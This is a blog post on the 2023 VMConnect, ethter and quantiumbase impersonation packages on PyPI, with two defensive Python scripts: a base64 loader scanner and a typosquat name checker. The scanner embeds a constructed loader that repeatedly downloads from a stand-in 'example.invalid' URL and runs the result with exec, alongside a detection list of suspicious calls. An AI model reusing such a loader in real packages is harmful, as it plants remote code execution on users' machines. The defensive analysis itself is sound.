Deceptive Python Packages on PyPI: The VMConnect Scam Targeting IT Professionals

In a recent software-supply-chain incident, a counterfeit package named ‘VMConnect’ was discovered on the Python Package Index (PyPI), impersonating the VMware vSphere connector module ‘vConnector’. The package was part of a campaign aimed at IT professionals who work with VMware tooling.

vConnector is a Python module for connecting to VMware vSphere, a widely deployed virtualization platform, and it is fetched from PyPI roughly 40,000 times a month. The security firm Sonatype reported, and the tech news outlet BleepingComputer covered, that the bogus VMConnect package appeared on PyPI on July 28, 2023 and was downloaded 237 times before it was removed on August 1, 2023. Further investigation by Sonatype uncovered two additional packages, ‘ethter’ and ‘quantiumbase’, carrying the same underlying code as VMConnect. These were downloaded 253 and 216 times respectively and impersonated ‘eth-tester’ and ‘databases’, both popular Python packages.

The malicious packages were engineered to look like the legitimate tools they copied, so that a user who installed one would not notice anything wrong and the infection would persist longer. Notably, the ‘VMConnect’ package carried a suspicious base64-encoded string in its ‘__init__.py’ file. Once decoded and executed, that string started a loop that periodically contacted an attacker-controlled URL to download and execute a second stage on the affected system. The URL was dressed up to look like a link to an image file, but what it served was plaintext code.
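The mechanism described above (a long base64 literal in ‘__init__.py’ that decodes to a loader calling out to a URL and passing the response to exec) is something a reviewer can check for statically before installing a package. The following scanner is an added example written for this article, not code from Sonatype or from the packages themselves. The sample ‘__init__.py’ it scans is constructed to mimic the reported pattern; its embedded loader points at the reserved ‘example.invalid’ domain and is only decoded and inspected, never executed.

```python
import ast
import base64
import binascii
import re

# Constructed sample: a stand-in for the kind of __init__.py described in the
# report. The base64 blob decodes to a small "stage one" loader that polls a
# URL disguised as an image and feeds whatever it gets to exec(). The domain is
# reserved (RFC 2606) and this text is never executed by the scanner.
STAGE_ONE = (
    "import urllib.request, time\n"
    "while True:\n"
    "    exec(urllib.request.urlopen('https://example.invalid/pic.jpg').read())\n"
    "    time.sleep(60)\n"
)
SAMPLE_INIT = (
    "from .client import Client\n"
    "__version__ = '1.0.0'\n"
    "exec(__import__('base64').b64decode('"
    + base64.b64encode(STAGE_ONE.encode()).decode()
    + "'))\n"
)
# A benign __init__.py for comparison (also constructed).
CLEAN_INIT = "from .client import Client\n__version__ = '1.0.0'\n"

# Quoted string literals of 40+ base64-alphabet characters. Short strings are
# ignored to keep noise (version strings, hashes) down.
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")
URL_RE = re.compile(r"https?://[^\s'\"()]+")
# Substrings that, inside a decoded blob, indicate fetch-and-run behaviour.
SUSPICIOUS = ("exec(", "eval(", "urlopen(", "requests.get(", "subprocess", "socket")


def decoded_blobs(source: str) -> list[str]:
    """Return every long base64 literal in *source* that decodes to UTF-8 text."""
    blobs = []
    for match in B64_LITERAL_RE.finditer(source):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
            blobs.append(raw.decode("utf-8"))
        except (binascii.Error, ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary payload: skip
    return blobs


def calls_exec_or_eval(source: str) -> bool:
    """True if the module itself calls exec() or eval() at any depth."""
    tree = ast.parse(source)
    return any(
        isinstance(node, ast.Call)
        and isinstance(node.func, ast.Name)
        and node.func.id in ("exec", "eval")
        for node in ast.walk(tree)
    )


def scan_init(source: str) -> list[dict]:
    """Flag decoded blobs that contain network/execution indicators or URLs."""
    findings = []
    for blob in decoded_blobs(source):
        indicators = [k for k in SUSPICIOUS if k in blob]
        urls = URL_RE.findall(blob)
        if indicators or urls:
            findings.append({"indicators": indicators, "urls": urls, "decoded": blob})
    return findings


if __name__ == "__main__":
    for label, src in (("sample", SAMPLE_INIT), ("clean", CLEAN_INIT)):
        print(label, "exec/eval:", calls_exec_or_eval(src), "findings:", scan_init(src))
```

Run against a downloaded sdist or wheel, the same two checks (an outer exec/eval call plus a long literal that decodes to code with URLs and exec in it) would have surfaced the VMConnect loader without ever running it. The decoded blob also hands you the callback URL as an indicator for egress filtering.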

Figure: the encoded line in the package's __init__.py file (Sonatype)

Ankita Lamba, a researcher at Sonatype, led the analysis but could not retrieve the second-stage payload because it had already been taken down from the external server. Even without those specifics, a package that silently contacts an obscure URL to fetch and execute code is a serious security concern in its own right.

Efforts to contact the author of these packages, who used the handle “hushki502” on both PyPI and GitHub, were unsuccessful. ReversingLabs also identified and reported on this campaign but, like Sonatype, could not conclusively determine the threat actor’s identity, the nature of the second-stage payload, or the attackers’ ultimate objectives.

Developers were unlikely to notice anything wrong with these packages unless they looked at the warning signs: a very short project history, relatively low download counts, encoded code hidden in some files, and names that were similar to, but not identical with, those of the legitimate projects. Accurate, realistic descriptions on PyPI and matching GitHub repositories made the packages look legitimate at first glance, which underscores the need for vigilance before installing anything from a public package index.
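One of the warning signs above, a name that is close to but not the same as a well-known package, can be checked mechanically before ‘pip install’ runs. The check below is an added example written for this article, not a tool from Sonatype, ReversingLabs or PyPI. It normalizes names the way PyPI treats them as equivalent (case and the separators ‘-’, ‘_’, ‘.’) and then computes the edit distance to an allowlist of names you actually intend to depend on; the allowlist here is a constructed one containing the three impersonated packages from the report. Note what it does and does not catch: ‘VMConnect’ and ‘ethter’ are flagged as lookalikes of ‘vconnector’ and ‘eth-tester’, while ‘quantiumbase’ is not, because it impersonated ‘databases’ through its description rather than its name.

```python
import re

# Constructed allowlist: the packages you genuinely mean to install.
KNOWN_GOOD = ["vconnector", "eth-tester", "databases", "requests"]


def normalize(name: str) -> str:
    """Lower-case and drop the separators PyPI treats as interchangeable
    (PEP 503), so 'Eth-Tester', 'eth_tester' and 'ethtester' compare equal."""
    return re.sub(r"[-_.]+", "", name.lower())


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute), O(len(a)*len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,           # delete ca
                           cur[j - 1] + 1,        # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def lookalikes(requested, known=KNOWN_GOOD, max_distance=3):
    """Map each requested name that is near, but not equal to, an allowlisted
    name onto the allowlisted name it resembles. Exact matches (after
    normalization) are the real package and are not reported."""
    flagged = {}
    for name in requested:
        n = normalize(name)
        if any(normalize(k) == n for k in known):
            continue
        closest = min(known, key=lambda k: levenshtein(n, normalize(k)))
        if levenshtein(n, normalize(closest)) <= max_distance:
            flagged[name] = closest
    return flagged


if __name__ == "__main__":
    # The three package names from the report plus one legitimate dependency.
    print(lookalikes(["VMConnect", "ethter", "quantiumbase", "requests"]))
```

A distance threshold of 3 is a starting point, not a rule; tune it against your own dependency list, and treat the name check as one signal alongside project age, download counts and a look inside the archive, since a convincing description and a GitHub repository will not trip it.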

🔥Subscribe to the channel: https://bit.ly/3vY16CT🔥

🚨Read my blog: https://angrysysops.com/

👊Twitter: https://twitter.com/AngrySysOps
👊Facebook: https://www.facebook.com/AngrySysOps
👊My Podcast: https://bit.ly/39fFnxm
👊Mastodon: https://techhub.social/@AngryAdmin

🔥vExpert info: https://bit.ly/3vXGPOa

Please leave a comment.